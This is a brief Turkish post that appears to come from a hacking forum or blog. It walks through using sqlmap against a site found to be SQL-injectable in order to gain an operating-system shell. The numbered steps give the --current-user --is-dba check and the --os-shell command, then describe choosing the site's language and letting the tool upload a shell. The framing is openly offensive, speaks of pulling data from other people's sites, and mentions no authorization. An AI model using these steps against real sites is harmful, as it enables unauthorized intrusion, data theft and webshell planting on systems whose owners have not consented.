SQL injection admin panelsiz siteye Shell upload etme

 

Sqlmap  İle Siteyi Nasıl shell upload ederiz.Sql açıklı sitemizi bulduk verilerimizi çektik.Şimdi sırada shell atmak var.

1.Olarak sqlmap -u (sql acıklı site) --current-user --is-dba

2. Bunu yazdıktan sonra current user:true diye bir çıktı çıkarsa shell atmaya çok yakınsınız.

3.Olarak  sqlmap -u (sql acıklı site) --os-shell yazıyoruz.

4.Ve sitenin dilleri geliyor hangi dille yazılmışsa onu işaretleriyoz.

5.Ve shellin nereye atılacağı geliyor 1 yazıp geçiyoruz ve artık kendisi shell atmayı deniyor zaten en altta shell atılmışsa çıkacaktır artık shelli upload edebiliriz.

Detaylı video için https://youtu.be/l34bi5fTm9E

Yorumlar